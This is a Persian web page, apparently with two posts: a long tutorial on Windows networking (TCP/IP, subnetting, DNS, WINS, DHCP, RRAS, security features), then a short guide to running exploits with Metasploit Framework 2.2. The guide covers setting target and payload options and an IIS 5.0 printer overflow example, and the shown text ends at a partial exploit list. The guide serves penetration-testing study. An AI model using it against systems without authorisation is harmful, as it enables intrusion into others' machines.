برای تبادل بنر کیلیک کنید

سیستم عامل ویندوز، نظیر سایر سیستم های عامل شبکه ای امکانات و پتانسیل های گسترده ای را در چارچوب مجموعه ای از تکنولوژی ، ارائه می نماید. تکنولوژی های ارائه شده را می توان در سه گروه عمده تقسیم نمود .

● ارتباطات
از اهداف اولیه یک سیستم عامل ؛ ارائه سرویس های ارتباطی لازم برای برنامه هائی است که بر روی سیستم عامل اجراء می گردند . ویندوز ۲۰۰۰ و ویندوز دات نت ، برنامه هائی را بهمراه API ارائه نموده که امکانات لازم در خصوص نیل به اهداف فوق را فراهم می نماید. بعبارت دیگر ، برنامه ها می بایست قادر به درخواست عملیات ارسال و دریافت داده با ساده ترین حالت ممکن،از سیستم عامل باشند.
سیستم عامل می بایست صرفنظر از نوع ارتباط ( شبکه محلی ، شبکه های بدون کابل ، ارتباطات مبتنی بر خط تلفن ) ، امکانات لازم را در این خصوص ارائه نماید.
ویندوز از پروتکل شبکه ای TCP/IP ، بعنوان پروتکل اولیه و ذاتی خود استفاده می نماید. ویندوز حمایت لازم در خصوص پروتکل های شبکه قدیمی تر نظیر Microsoft NWLink که با پروتکل شبکه ای IPX/SPX شرکت ناول ، سازگار است را نیز ارائه می نماید . مزیت مهم پروتکل TCP/IP ، عدم وابستگی آن نسبت به نوع محیط انتقال است . بدین ترتیب ، امکان استفاده از پروتکل فوق ، در هر نوع شبکه ای وجود خواهد داشت .
سرویس دهندگان NET Enterprise . ، بصورت مستمر با پروتکل TCP/IP ، در ارتباط بوده و از آن بعنوان پروتکل اساسی استفاده می نمایند . با توجه به نقش حیاتی پروتکل فوق برای اکثر سرویس دهندگان NET Enterprise . ، طراحی ، پیاده سازی و نگهداری شبکه ای که از سرویس دهندگان NET Enterprise . ، استفاده می نماید ، مستلزم شناخت مناسبی از نحوه عملکرد پروتکل TCP/IP و نحوه ارتباط برنامه ها با آن است. دراین مقاله قصد نداریم به جزئیات مربوط به پروتکل TCP/IP پرداخته و هدف صرفا" آشنائی با مفاهیم اولیه پروتکل فوق ، بمنظور استفاده در شبکه های مبتنی بر سیستم عامل ویندوز است .

● آدرس دهی TCP/IP
تمامی کامپیوترهای موجود بر روی یک شبکه مبتنی بر TCP/IP ، می بایست دارای یک آدرس منحصربفرد باشند. ( آدرس فوق ، IP نامیده می شود) . عملکرد آدرس فوق شباهت زیادی به اختصاص یک شماره تلفن خاص برای کامپیوتر دارد . آدرس ها در زمان درج( واردکردن) و نمایش با فرمت dotted-decimal ارائه می شوند.( نظیر : IP:۱۹۲.۱۶۸.۱۰.۱۰ ) . هر گروه از اعداد توسط یک نقطه از هم جدا می شوند که از آنان با نام octet ، یاد می گردد .
▪ یک آدرس IP ، شامل دو بخش متفاوت اطلاعاتی است :
۱) یک شماره مشخصه شبکه ( Network ID Number )
۲) یک شماره مشخصه منحصربفرد میزبان ( host ID number ) .
شماره مشخصه شبکه ، شباهت زیادی به کد یک ناحیه و یا شهرداشته و توسط تمامی کامپیوترهای موجود بر روی یک شبکه ، به اشتراک گذاشته می شود. شماره مشخصه میزبان ، باقیمانده شماره تلفن است .و بصورت کاملا" انحصاری یک میزبان خاص در شبکه را مشخص خواهد کرد . بمنظور اطمینان از این موضوع که تمامی کامپیوترهای موجود در اینترنت دارای یک آدرس IP منحصربفرد می باشند ، فرآیند اختصاص آدرس های IP ، توسط IANA)Interner Assigned Numbers Authority) مدیریت می گردد .
IANA ، آدرس های IP را در اختیار مراکز اصلی ISP ، قرار داده و و مراکز فوق، آدرس های IP را در اختیار افراد حقوقی و حقیقی قرار خواهند داد. IANA ، سه بلاک از آدرس های IP را برای استفاده خصوصی ، رزو نموده است. (امکان استفاده از آدرس های فوق ، در اختیار کامپیوترهای اینترنت قرار نخواهد گرفت) .سازمان ها و موسسات می توانند از آدرس های خصوصی فوق، در شبکه های اختصاصی خود استفاده نمایند.
مدل آدرس دهی جدید IP ، با نام IPv۶ ، است و قرار است به نیاز تصاعدی ( فزاینده ) در رابطه با تعداد آدرس های در دسترس و عمومی پاسخگو باشد. سخت افزار ها و نرم افزارها ی موجود در حال حاضر امکانات حمایتی لازم بمنظور استفاده ازIPv۶ را دارا نمی باشند و بدین دلیل ما همچنان از مدل آدرس دهی قدیمی استفاده می نمائیم . IPv۶ ، چندین سال است که مطرح گردیده است ولی عملیات آداپته نمودن آن دارای آهنگی کند است و نباید انتظار داشته باشیم که مدل آدرس دهی فوق را بزودی در محیط خود شاهد باشیم.
با اینکه کامپیوترهائی که از آدرس خصوصی IP استفاده می نمایند ، قادر به دستیابی مستقیم به اینترنت نمی باشند ( برای دستیابی به اینترنت ، می بایست ازیک آدرس عمومی IP استفاده گردد) . از NAT)Network Address Translation) بعنوان پتانسیلی که قادر به ترجمه آدرس های عمومی و خصوصی است ، استفاده می گردد. NAT ، امکان استفاده از آدرس های IP خصوصی بمنظور اتصال به اینترنت را برای کاربران یک سازمان، فراهم و باعث کاهش تعداد آدرس های IP عمومی مورد نیاز بمنظور ارتباط ودستیابی به اینترنت می گردد . سرویس ( Routing and Remote Access Service(RRAS ویندوز دارای قابلیت ها و پتانسیل های NAT بهمراه سایر پتانسیل های کلیدی دیگر است.

● روتنیگ و Subnet
برای یک شبکه کامپیوتری وجود تعداد زیادی کامپیوتر در شبکه و عدم توانائی بمنظور سرویس دهی مناسب و سریع به آنان ، نمی تواند بعنوان یک مزیت مطرح گردد. ( دقیقا" مشابه وجود تعداد زیادی اتومبیل در یک بزرگراه ). شبکه های کامپیوتری بمنزله منابع ارتباطی مشترکی بوده و حضور تعداد زیادی کامپیوتر بر روی یک شبکه نظیر وجود صدها اتومیبل سرگردان در ترافیک یک بزرگراه است . بمنظور پیشگیری از ازدحام( شلوغی ) ، شبکه های کامپیوتری به چندین بخش مستقل دیگر و با نام " سگمنت " ( Segment ) ، تقسیم می گردند. هر سگمنت ، اساسا" خود یک شبکه کامپیوتری با قابلیت های منحصر بفرد خود است. با توجه به رویکرد فوق ( تقسیم شبکه به چندین سگمنت) ، ما با مسئله ای دیگر مواجه خواهیم شد و آنهم نحوه انتقال اطلاعات بین هر یک از شبکه ها است .
اگر شما شبکه های کامپیوتری را بعنوان همسایه ای در مجاورت منزل خود در نظر بگیرید، می توان عرضه اطلاعات بین آنها را نظیر توزیع یک نامه دانست در صورتیکه قصد ارسال نامه برای شخصی در همسایگی خود را داشته باشید ، می بایست متن مورد نظر خود را نوشته و آن را در صندوق پستی مربوطه ، قرار دهید . در صورتیکه قصد ارسال نامه برای همسایه دیگری را داشته باشیم ( ساکن در محلی دیگر در کشور) ، به اداره پست مراجعه و نامه را برای وی ارسال می نمائیم . اداره پست، با فرآیند توزیع ( روت) یک نامه از نقطه ای به نقطه ای دیگربخوبی آشنا بوده و می تواند نامه را با کارآئی مطلوبی به مقصد مورد نظر برساند. زمانیکه اطلاعات از کامپیوتری در شبکه به کامپیوتری در شبکه دیگر ارسال می گردند،ما با واقعیتی مهم و با نام " روتینگ " ( Routing ) مواجه خواهیم بود.
روتینگ ، توسط دستگاههای سخت افزاری خاصی با نام "روتر" ، مدیریت و اداره می گردد . روترها ، چندین شبکه را در زمان یکسانی بیکدیگر متصل و مسئول انتقال اطلاعات ( داده ) بین شبکه ها می باشند. عملکرد روترها بر این واقعیت مسلم استواراست که در فرآیند انتقال اطلاعات توسط TCP/IP ، آدرس IP کامپیوتر مقصد، حضوری کاملا" محسوس و همیشگی دارد. آدرس های IP شامل مشخصه شبکه ( Network ID ) و مشخصه میزبان ( Host ID ) می باشند. با تامل در یک آدرس IP عمومی نظیر IP: ۱۰.۱.۴.۲۵۰ ، تشخیص مشخصه شبکه و میزبان ، امری مشکل بنظر می آید.
بمنظور مشخص نمودن مشخصه های فوق ، کامپیوترها از Subnet mask استفاده می نمایند. بمنظور شناخت مناسب نسبت به نقش Sunet mask ، لازم است بدین نکته بدیهی! اشاره گردد که تمام فعالیـت ها در کامپیوتر با فرمت باینری ، انجام می شود. بعبارت دیگر، هر چیز در کامپیوتر بصورت مجموعه ای از صفر و یک نمایش داده می شود . فرص کنید Subnet mask ، مثال فوق را Subnet: ۲۵۵.۲۵۵.۰.۰ ، در نظر بگیریم . در صورتیکه هر octet درآدرس IP و Subnet mask را به باینری تبدیل نمائیم ، نتایج زیر را خواهیم داشت :
IP address : ۰۰۰۰۱۰۱۰.۰۰۰۰۰۰۰۱.۰۰۰۰۰۱۰۰ .۱۱۱۱۱۰۱۰
Subnet mask: ۱۱۱۱۱۱۱۱.۱۱۱۱۱۱۱۱.۰۰۰۰۰۰۰۰ .۰۰۰۰۰۰۰۰
Subnet mask ، مشخص می نماید که کدام بخش از آدرس IP ، نشاندهنده مشخصه شبکه و کدام بخش نشاندهنده مشخصه میزبان است . دقت داشته باشید که هرoctet ، شامل هشت رقم باینری است و یا بیت است . هر بیت در Subnet mask که مقدار یک را دارا است ، نشاندهنده بخشی از آدرس IP مشخصه شبکه ، است . هر صفر در Subnet mask مرتبط با یک بیت در آدرس IP ، مربوط به مشخصه میزبان است . بنابراین ، در مثال فوق، مشخصه شبکه شامل network ID : ۱۰.۱.x.x و مشخصه میزبان host ID : ۴.۲۵۰ ، است . دقت داشته باشید که Subnet mask ، می بایست همواره شامل رشته ای از یک ها بوده که بدنبال آن رشته ای از صفرها ، قرار می گیرد. از لحاظ تئوری این امر امکان پذیر خواهد بود که دارای یک Sunbet mask باشیم که به چیزی مطابق زیر ترجمه شده باشد( رشته یک ها و صفرها با اصل اشاره شده مغایرت داشته باشد) . ولی این نوع subnet در حال حاضر توسط TCP/IP حمایت نمی گردد .
۱۱۱۱۰۱۱۱.۰۰۱۱۱۱۰۰.۱۱۱۰۰۰۱۱ .۰۰۰۰۰۰۰۰
زمانیکه ویندوز نیازمند ارسال اطلاعات است ، از مشخصه شبکه مقصد، استفاده و آن را با مشخصه شبکه مربوط به خود ، مقایسه می نماید. در صورتیکه دو مشخصه شبکه ، یکسان باشند، ویندوز اطلاعات را برای یک کامپیوتر محلی موجود بر روی شبکه ارسال می نماید( ضرورتی به روتینگ وجود نخواهد بود) . در صورتیکه مشخصه های دو شبکه یکسان نباشند ، ویندوز اطلاعات رابرای gateway پیش فرض ، ارسال می نماید. ( یک آدرس IP خاص که در ویندوز پیکربندی شده است) . gateway پیش فرض، معمولا" یک روتر است . روتر مسئولیت استقرار داده بر روی شبکه مورد نظر را بر عهده داشته و در صورت لزوم بسته اطلاعاتی را برای روتر دیگر ارسال خواهد کرد .

● پورت های برنامه
زمانیکه یک بسته اطلاعاتی به مقصد مورد نظر می رسد ، کامپیوترمقصد نیازمند روشی بمنظور تشخیص نوع عملیاتی است که می بایست در رابطه با بسته اطلاعاتی دریافتی انجام شود. انجام چندین عملیات متفاوت بصورت همزمان و نگهداری وضعیت شبکه در یک حالت مطمئن و کارآ ، امری پیچیده بنظر می آید. مثلا" فرض کنید ، با استفاده از برنامه مرورگر، قصد مشاهده یک وب سایت را در پنجره مربوطه داشته باشید و در همان حالت پنجره ای دیگر فعال و یک سند word ، در آن فعال شده باشد در چنین حالتی بر روی کامپیوتر خود شاهد دو نوع ترافیک خواهیم بود: ترافیک داده هائی که باعث نمایش صفحه وب در مرورگر شده و ترافیک داده هائی که باعث نمایش یک سند word خواهد شد. کامپیوتر شما چگونه از این موضوع آگاهی پیدا می نماید که مرورگر می بایست اولین بخش داده را دریافت در حالیکه Word می بایست بخش دیگری را اخذ نماید؟
پاسخ به سوال فوق ، شماره پورت ( port ) است . پورت ، مشابه یک آدرس IP برای یک برنامه خاص موجود بر روی کامپیوتر است . زمانیکه کامپیوتر شما داده ئی را ارسال می نماید ، داده برای یک آدرس IP ارسال می گرددکه نشاندهنده شبکه و میزبان مقصد مورد نظر ، بهمراه یک شماره پورت خاص است که برنامه خاصی را بر روی کامپیوتر مقصد ، بعنوان مقصد نهائی اطلاعات مشخص خواهد کرد. مثلا" درخواست های مربوط به صفحات وب ، همواره برای پورت ۸۰ ارسال خواهد شد . IANA ، مسئولیت اختصاص شماره پورت به برنامه ها را نیز برعهده داشته و این اطمینان بوجود خواهد آمد که اکثر برنامه های متداول دارای یک شماره پورت منحصر بفرد در این راستا خواهند بود . زمانیکه یک کامپیوتر مبتنی برسیستم عامل ویندوز، داده ئی را دریافت می نماید ، شماره پورت آن بررسی تا مشخص گردد که کدام برنامه می بایست داده را دریافت نماید.
پورت ها دارای نقشی مهم در رابطه با امنیت می باشند.
تعداد زیادی از شرکت ها ، امکان استفاده عموم از وب سایت و یا سرویس دهنده FTP را بمنظور دریافت فایل ، فراهم می نمایند. شرکت ها و موسسات تمایلی به فراهم نمودن امکان دستیابی عموم به سرویس دهندگان فایل ، سرویس دهندگان چاپ و سایر منابع موجود درشبکه اختصاصی خود ، را ندارند.هر یک ازعملیات فوق ، از طریق یک شماره پورت خاص انجام شده و می توان بنوعی آنها را بلاک نمود. پورت ها دارای جایگاهی خاص بمنظور فیلترینگ ترافیک و ایمن سازی شبکه می باشند. دستگاه های شبکه ای که "فایروال " نامیده شده و یا نرم افزارهای فایروال نظیر ISA(Internet Security and Acceleration Server) ، قادر به کنترل ترافیک ورودی به شبکه بر روی شماره پورت های خاصی بوده و حتی می توان ترافیک را بر روی پورت های خاصی ، بلاک کرد .
IANA، شماره پورت های صفر تا ۱۰۲۴ را تعریف که از آنان با نام پورت های " خوش نام " ، یاد می گردد. ویندوز شامل لیستی از این پورت ها بوده که در یک فایل متنی با نام Services و در آدرس system۳۲\Drivers\ETC ، ذخیره شده اند.

● سرویس های شبکه
سیستم عامل ویندوز، مجموعه ای از سرویس های اساسی شبکه را ارائه که می توان از آنان در هر نوع شبکه ( بزرگ تا کوچک )، استفاده کرد . این سرویس ها توسط عناصر انتخابی که بهمراه ویندوز ارائه می گردند ، قابل استفاده خواهند بود. امکانات فوق، شامل : سرویس Name Resolution ، سرویس پیکربندی IP و سرویس RRAS ، می باشد. در ادامه به تشریح هر یک از سرویس های فوق خواهیم پرداخت .

● سرویس Name Resolution
سرویس Name Resolution ، در هر نوع شبکه دارای اهمیت و جایگاهی خاص است. کامپیوترها برای آدرس دهی یکدیگر علاقه مند به استفاده از آدرس های IP می باشند ولی ما ، با اسامی معنی دار بهتر کار می کنیم ( مثلا" ServerA ) . سرویس name Resolution ، این امکان را در اختیار کاربران قرار خواهد داد که همچنان از اسامی معنی دار برای سرویس دهندگان و سایر منابع شبکه استفاده نمایند. در چنین مواردی می بایست از امکاناتی بمنظور ترجمه (Resolve ) اسامی به آدرس های IP استفاده تا در ادامه زمینه ارتباطات در شبکه فراهم گردد . ویندوز در این رابطه دو سرویس را ارائه نموده است :
DNS)Domain Name System) و WINS)Windows Internet Naming Service) .

● DNS
سرویس DNS ، توسط کامپیوترهائی که بر روی آنان یک سرویس دهنده DNS اجراء شده است ، ارائه می گردد. سیستم های عامل ویندوز تقریبا" با هر نوع سرویس دهنده DNS ، استاندارد سازگار می باشند . ( مثلا" سرویس دهندگانی که بر روی سیستم عامل یونیکس اجراء می گردند) . ویندوز دارای نسخه اختصاصی خود در رابطه با سرویس دهنده DNS بوده که می توان آن را بر روی هر نوع سیستم عامل ویندوز ( ۲۰۰۰ و یا دات نت ) ، نصب نمود.
تفاوت بین DNS و WINS چیست ؟ WINS ، بمنظور ترجمه اسامی کامپیوترها به آدرس های IP ، استفاده می گردد.اسامی استفاده شده ، نوع خاصی از نام های مبتنی بر ویندوز می باشند. DNS ، بمراتب متداول تر بوده و از آن بمنظور ترجمه اسامی میزبان استفاده می شود . در محیط ویندوز ، تفاوت زیادی بین دو نوع نام ( اسامی خاص مبتنی بر ویندوز و اسامی میزبان ) وجود نداشته و هر دو نوع ، معادل می باشند. از نسخه ویندوز ۲۰۰۰ به بعد ، تاکید مضاعف بر استفاده از DNS در دستور کار قرار گرفته و ماکروسافت ، استفاده محدود و کم رنگ WINS در ویندوز را بعنوان یک سیاست محوری در ویندوز دنبال می نماید.
بمنظور پیکربندی IP هریک از کامپیوترهای موجود درشبکه ، می بایست آدرس IP و حداقل یک سرویس دهنده DNS را مشخص کرد. در این رابطه نمی توان از نام سرویس دهنده DNS در مقابل آدرس IP ، استفاده نمود.(روشی بمنظور ترجمه اسامی به آدرس IP بدون یک سرویس دهنده DNS وجود ندارد). پس از پیکربندی آدرس IP سرویس دهنده DNS ، ویندوز ۲۰۰۰ و نسخه های بعد از آن ، قادر به استفاده از سرویس دهنده DNS بمنظورترجمه نام به آدرس IP معادل ، خواهند بود.
سیستم DNS اینترنت ، بصورت سلسله مراتبی است . در بالاترین سطح ، domain های سطح بالا و یا TLDs)Top-level Domains) ، قرار دارند. استفاده کنندگان متعددی از سرویس دهندگان DNS مربوط به TLD اینترنت استفاده می نمایند . این سرویس دهندگان شامل مرجع کاملی در ارتباط با سایر سرویس دهندگان در ساختار سلسله مراتبی، می باشند. فرض کنید که شما قصد ارتباط با را داشته باشید و سرویس دهنده DNS سازمان شما ، دارای یک entry برای نمی باشد . در این حالت با یک سرویس دهنده DNS تائید شده دیگر درTLD ، ارتباط برقرار می گردد.سرویس دهده TLD ، از آدرس سرویس دهنده معتبری که شامل آدرس Test.com ، آگاهی داشته و سرویس دهنده قادر به ارائه یک آدرس برای کامپیوتری با نام ، خواهد بود . فرآیند فوق ، دارای انعطاف و کارآئی بالا در رابطه با یافتن آدرس IP مربوط به domain name ، است .
ویندوز از یک ویژگی خاص DNS با نام Dynamic DNS)DDNS) ، استفاده می نماید. زمانیکه یک کامپیوتر مبتنی برویندوز ۲۰۰۰ ( و یا نسخه های بعد از آن ) فعالیت خود را آغاز می نماید ، با سرویس دهنده DNS مربوطه ، مرتبط و نام کامپیوتر و آدرس IP موجود خود را در اختیار آن قرار خواهد داد .سرویس دهنده DNS ، بانک اطلاعاتی خود را بهنگام تا متاثر ازآخرین تغییرات گردد. DDNS ، امکان بهنگام سازی پویای سرویس دهنده DNS را برای کامپیوترها فراهم می نماید. بدین ترتیب ، بانک اطلاعاتی DNS شامل آخرین اطلاعات مرتبط با آدرس های IP شده و سرویس دهنده DNS ، قادر به ارائه سرویس خود بصورت پویا و متاثر از آخرین تغییرات انجام شده در شبکه ، خواهد بود .
بمنظور کاهش حجم عملیات مربوط به name resolution در یک محیط عملیاتی بزرگ ، می توان از یک سرویس دهنده ثانویه و یا سرویس دهندگان Caching ، استفاده کرد. سرویس دهنده ثانویه ، دارای بانک اطلاعاتی اختصاصی خود نبوده و از بانک اطلاعاتی DNS موجود بر روی یک سرویس دهنده DNS اولیه ، استفاده می نماید. سرویس دهندگان ثانویه ، گزینه ای مناسب برای ارائه خدمات مربوط به name resolution بوده ولی قادر به بهنگام سازی پویای DNS نخواهند بود. ( برخی از انواع سرویس دهندگان ثانویه قادر به دریافت اطلاعات بهنگام شده و ارسال آنان برای سرویس دهنده اولیه ، می باشند ) . سرویس دهندگان Caching DNS ، زمانیکه یک درخواست name resolution را دریافت می نمایند ، با یک سرویس دهده DNS بمنظور اتمام عملیات خود ، ارتباط برقرار خواهد کرد. سرویس دهنده Caching ، درادامه آدرس IP را استفاده و آن را بمنظور پاسخ به درخواستی مشابه ، ذخیره می نماید.
نرم افزار سرویس دهنده DNS ویندوز، امکان ذخیره داده های DNS را در یک فایل متن و یا در اکتیو دایرکتوری ، فراهم می نماید. با انتخاب اکتیو دایرکتوری ، دارای گزینه ای مبنی بر نصب DNS بر روی هر domain controller خواهیم بود. در چنین مواردی در صورت بروز اشکال دراکتیو دایرکتوری ، امکان بازیابی سریع اطلاعات وجود خواهد داشت ( می توان DNS را بر روی یک domain controller دیگر نصب تا زمینه استفاده از اطلاعات DNS موجود در اکتیو دایرکتوری ، فراهم گردد.) .

● WINS
سرویس WINS ، دارای عملکردی نسبتا" مشابه DNS با تفاوت هائی اندک است . قبل از ویندوز ۲۰۰۰ ، کامپیوترهای موجود در شبکه از پروتکلی با نام NetBIOS استفاده می کردند. در چنین حالتی ، هر کامپیوتر دارای یک نام منحصر بفرد بوده و سرویس دهنده WINS ، مسئول ارائه سرویس name resolution بمنظور ترجمه اسامی NetBIOS ، به آدرس های IP معادل است. DNS ، نیز نیازمند یک نام منحصر بفرد است ( صرفا" در یک domain خاص). مثلا" DNS ، امکان تعریف نام Client۱ را برای یک کامپیوتر موجود در حوزه Test.com و Microsoft.com ، فراهم می نماید.WINS ، از یک سیستم نامگذاری مسطح تبعیت نموده و می بایست تمامی کامپیوترهای موجود در شبکه دارای اسامی منحصر بفردی باشند .بدین ترتیب نباید انتظار داشته باشیم که از سرویس WINS ، در شبکه اینترنت ، استفاده گردد ( در اینترنت از سرویس DNS ، استفاده می گردد) . استفاده ازسرویس WINS درصورت لزوم فقط برای شبکه های محلی خصوصی، پیشنهاد می گردد.
ویندوز ۲۰۰۰ و نسخه های بعد از آن ، همچنان از اسامی NetBIOS بمنظور سازگاری با نسخه های قبل از خود استفاده می نمایند . در ویندوز ۲۰۰۰ و ویندوز دات نت ، سرویس دهنده WINS ، نیز ارائه گردیده تا زمینه حمایت و سازگاری برای سرویس گیرندگان قدیمی که همچنان مرتبط با WINS ، می باشند ، فراهم گردد. ماکروسافت بتدریج استفاده از NetBIOS را حذف و از DNS برای ترجمه نام به آدرس ، در مقابل سرویس WINS استفاده می نماید.
یکی از ویژگی های منحصربفرد سرویس WINS ، قابلیت تکرارپذیری( Replicate ) آن بین سرویس دهندگان متعدد WINS در یک شبکه است .بدین ترتیب ، می توان از چندین سرویس دهنده WINS بر روی شبکه بهمراه یک بانک اطلاعاتی مشترک بین آنها ، استفاده گردد. سرویس دهنده WINS ، قادر به ارتباط با سایر سرویس دهندگان بمنظور مبادله اطلاعات جدید و آدرس های بهنگام شده IP ، خواهد بود.

● پیکربندی IP
بر روی یک شبکه کوچک ، پیکربندی آدرس های IP ، Subnet mask , default gatway ,DNS و WINS برای هریک از کامپیوترهای موجود درشبکه کار مشکلی نخواهد بود . در شبکه های بزرگ که شامل صدها و یا هزاران کامپیوتر می باشند ، پیکربندی دستی مصیبتی است بس بزرگ ! و زمان زیادی را بخود اختصاص خواهد داد. پروتکل TCP/IP شامل پروتکلی با نام DHCP)Dynamic Host Configuration Protocol) بوده که می توان از آن بمنظور درخواست پویای پیکربندی IP ، از یک سرویس دهنده DHCP ،استفاده نمود. پیکربندی سرویس دهنده DHCP ، می تواند بگونه ای صورت پذیرد که شامل اطلاعات ضروری مرتبط با پیکربندی IP ، باشد . سرویس دهنده فوق ، وضعیت آدرس های IP تخصیص یافته را ثبت تا این اطمینان بوجود آید که هرگز از دو آدرس مشابه درشبکه استفاده نخواهد شد. سرویس دهنده DHCP ، همچنین قادر به ارائه آدرس سرویس دهندگان DNS، WINS و gateway پیش فرض مرتبط با سگمنت مربوطه، خواهد بود.

● سرویس روتینگ و دستیابی از راه دور ( RRAS)
ویندوز ، شامل سرویس RRAS)Routing and Remote Access Service) است. سرویس فوق ، این امکان را برای یک سرویس دهنده ویندوز فراهم می نماید که بعنوان یک روتر نرم افزاری ، یک سرویس دهنده VPN)Virtual private network) و یک سرویس دهنده Dial-up مطرح گردد. نرم افزار RRAS ، بصورت پیش فرض برروی ویندوز نصب می گردد ولی بمنظور انجام عملیات خاصی ، پیکربندی نشده است. اکثر مدیران شبکه از RRAS بعنوان یک سرویس دهنده VPN استفاده و از آن بمنظور ارتباط دو شبکه موجود در ادارات یک سازمان از طریق اتصال اینترنت استفاده می نمایند. مدیران شبکه می توانند ، پیکربندی لازم در خصوص استفاده از سرویس RRAS بمنظور دستیابی از طریق تلفن به شبکه را برای پرسنل سازمان خود، فراهم نمایند.

● امنیت
شاید مهمترین عملیاتی که یک سیستم عامل شبکه ای می بایست انجام دهد ، پرداختن و بهاء دادن به مقوله امنیت است . سیستم عامل ویندوز شامل تکنولوژی های متعددی بمنظور افزایش امنیت است :
سیستم فایل NTFS ، پتانسیل های لازم بمنظور اختصاص مجوزهای دستیابی لازم را برای کاربران و یا گروه ها ، فراهم می نماید .
ویندوز، پروتکل IPSec را حمایت می نماید . IPSec ، پروتکلی است که امنیت را در سطح پروتکل های حمل شبکه ، اعمال می نماید . IPSec می تواند بمنظور رمزنمودن نوع خاصی از ترافیک ، رمزنگاری ترافیک بین کامپیوترهائی خاص و سایر موارد مشابه استفاده گردد. مثلا" اگر سازمانی دارای یک سرویس دهنده فایل حاوی اطلاعات محرمانه است ، می توان IPSec را بر روی سرویس دهنده فوق ، پیکربندی نمود. بدین ترتیب، سرویس دهنده صرفا" ارتباطاتی را از سرویس گیرندگانی می پذیرد که قادر به حمایـت از یک ارتباط رمز شده ، باشند .
کامپیوترهای مبتنی بر سیستم عامل ویندوز را می توان بمنظور استفاده از رمزهای عبور پیچیده و طولانی در ارتباط با account های مربوط به کاربران ، پیکربندی کرد. تشخیص و حدس چنین رمزهای عبوری ، کار مشکلی خواهد بود. با استفاده از سایر سیاست های امنییتی رمز عبور، می توان کاربران را ملزم به تغییر رمز عبور در محدوده های زمانی مشخص ، استفاده از رمز عبور منحصر بفرد و متفاوت با دفعات قبل و قفل نمودن یک account در مواردیکه افرادی قصد تشخیص آن را بصورت سعی و خطاء دارند ، نمود.
کامپیوترهای ویندوز ۲۰۰۰ و بعد از آن ، بصورت ذاتی از پروتکل تائید Kerberos ، استفاده می نمایند. بدین ترتیب سرویس دهنده تضمین لازم در خصوص شناسائی و تائید کاربر را انجام و کاربران نیز اطمینان لازم در خصوص ارتباط با یک سرویس دهنده مطمئن را بدست خواهند آورد.
ویندوز دارای یک API)Appliaction Programming Interface) لازم، بمنظور رمزنگاری داده ها با نام CryptoAPI است . اینترفیس فوق ، تسهیلات لازم در خصوص ایجاد نرم افزارهائی که نیازمند استفاده از روش های رمزنگاری بمنظور حفاظت از اطلاعات می باشند را فراهم می نماید.
سیستم فایل NTFS ، امکانات حمایتی لازم در خصوص Encrypted File System)EFS) را ارائه می نماید . بدین ترتیب ، کاربران قادر به رمز نمودن فایل ها بوده و در ادامه می توانند براحتی به فایل های رمز شده دستیابی نمایند ( نظیر فایل هائی که رمز شده نیستند ) . سایر کاربران قادر به دستیابی به فایل های رمز شده نخواهند بود. بمنظور حفاظت از اطلاعات در یک سازمان، EFS ، پتانسیل های لازم در خصوص بازیافت داده ها را برای مدیران تائید شده که نیازمند داده های رمز شده می باشند، فراهم می نماید.
پیکربندی پیش فرض، سیستم عامل ویندوز نسبتا" غیر ایمن است .ظاهرا" هدف ماکروسافت دراین رابطه تسهیل در نصب و مدیریت سیستم عامل بوده است . همین موضوع می تواند منشاء برخی از تهاجمات اطلاعاتی در رابطه با سیستم هائی باشد که پذیرای حکومت سیستم عامل ویندوز شده اند. ماکروسافت در نسخه های ویندوز دات نت ، از سیاست فوق ، عدول و سعی نموده است امکانات گسترده ای را بمنظور ایمن سازی پیکربندی پیش فرض، ارائه نماید. بمنظور انتخاب تعداد زیادی از ویژگی های Windows .NET Server ۲۰۰۳ ، می بایست پیکربندی و نصب اضافه ای انجام شود. بسیاری از ویژگی های اختیاری ( نظیر IIS ) بصورت پیش فرض غیر فعال می باشند.

Iran Developers

Metasploit Framework Version 2.2
بعد از نصب برنامه فایل msfconsole را اجرا کنید تا پرامپت متااسپلویت و ببینید.
همکنون ما در مود اصلی هستیم (main Mode) و میتوانید با زدن دستور help تمام دستورات قابل اجرا را مشاهده کنید.
با وارد کردن دستور show exploits میتوانید لیست اکسپلویت های موجود را ببینید. و یا برای دیدن جزئییات هر اکسپلویت از دستور( show modul_name) استفاده کنید.

انتخاب اکسپلویت:

برای انتخاب اکسپلویت از دستور use و برای خارج شدن ار این حالت از back استفاده کنید.
برای استفاده از هر ماژول اکسپلویت احتیاج به تنظیم Option های آن میباشد ..برای دیدن این آپشن ها ار دستور show options استفاده کنید.(دقت کنید . ابتدا اکسپلویت مورد نظر را انتخاب کرده و بعد میتوان option های آن را تغییر دهید.
آپشن های کاربردی:

RHOST: از این آپشن برای تنظیم آدرس هدف استفاده میشود
RPORT: از این آپشن برای تنظیم پورت مورد نظر بر روی هدف استفاده میشود.
LHOST: تنظیم آدرس شخصی
LPORT: برای تنظیم آدرس پورت شخصی
PAYLOAD: پی لود نوع دستوراتی را مشخص میکند که بعد از این که هدف با موفقیت exploit شد. بر روی هدف اجرا میشود. برای دیدن لیست این پی لود ها از دستور show payloads استفاده کنید.
TARGET : نوع برنامه ای را که قرار است exploit شود مشخص میکند. برای دیدن اهداف از دستور show targets استفاده کنید.
برای ست کردن هر کدام ار این option ها از دستور set استفاده کنید.
در انتها برای اجرای اکسپلویت ار دستور exploit استفاده کنید.
نکته: حتما دقت کنید که برای option ها از حروف بزرگ استفاده شود.

مثال:

اجرای اکسپلویت IIS 5.0 Printer Buffer Overflow




__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( <_> ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ v2.2 \/ \/ |__|

+ -- --=[ msfconsole v2.2 [32 exploits - 33 payloads]

[msf > show exploits[/B

Metasploit Framework Loaded Exploits
====================================

Credits Metasploit Framework Credits
afp_loginext AppleFileServer LoginExt PathName Buffer Overflow

apache_chunked_win32 Apache Win32 Chunked Encoding
blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow
distcc_exec DistCC Daemon Command Execution
exchange2000_xexch50 Exchange 2000 MS03-46 Heap Overflow
frontpage_fp30reg_chunked Frontpage fp30reg.dll Chunked Encoding
ia_webmail IA WebMail 3.x Buffer Overflow
iis50_nsiislog_post IIS 5.0 nsiislog.dll POST Overflow
iis50_printer_overflow IIS 5.0 Printer Buffer Overflow
iis50_webdav_ntdll IIS 5.0 WebDAV ntdll.dll Overflow
